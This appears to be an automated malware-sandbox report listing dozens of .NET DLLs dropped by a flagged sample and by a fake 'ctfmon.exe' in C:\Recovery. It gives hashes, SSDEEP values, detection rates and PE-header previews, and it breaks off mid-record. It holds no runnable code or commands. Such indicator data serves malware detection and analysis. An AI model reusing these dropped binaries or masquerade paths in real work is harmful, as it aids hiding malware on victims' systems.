                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.529329139831718
                                                  Encrypted:false
                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):5.645950918301459
                                                  Encrypted:false
                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38912
                                                  Entropy (8bit):5.679286635687991
                                                  Encrypted:false
                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34816
                                                  Entropy (8bit):5.636032516496583
                                                  Encrypted:false
                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.660491370279985
                                                  Encrypted:false
                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                  MD5:240E98D38E0B679F055470167D247022
                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89600
                                                  Entropy (8bit):5.905167202474779
                                                  Encrypted:false
                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24576
                                                  Entropy (8bit):5.535426842040921
                                                  Encrypted:false
                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):50176
                                                  Entropy (8bit):5.723168999026349
                                                  Encrypted:false
                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28160
                                                  Entropy (8bit):5.570953308352568
                                                  Encrypted:false
                                                  SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                  MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                  SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                  SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34304
                                                  Entropy (8bit):5.618776214605176
                                                  Encrypted:false
                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.529329139831718
                                                  Encrypted:false
                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.629584586954759
                                                  Encrypted:false
                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):5.645950918301459
                                                  Encrypted:false
                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):41472
                                                  Entropy (8bit):5.6808219961645605
                                                  Encrypted:false
                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38400
                                                  Entropy (8bit):5.699005826018714
                                                  Encrypted:false
                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                  MD5:87765D141228784AE91334BAE25AD743
                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
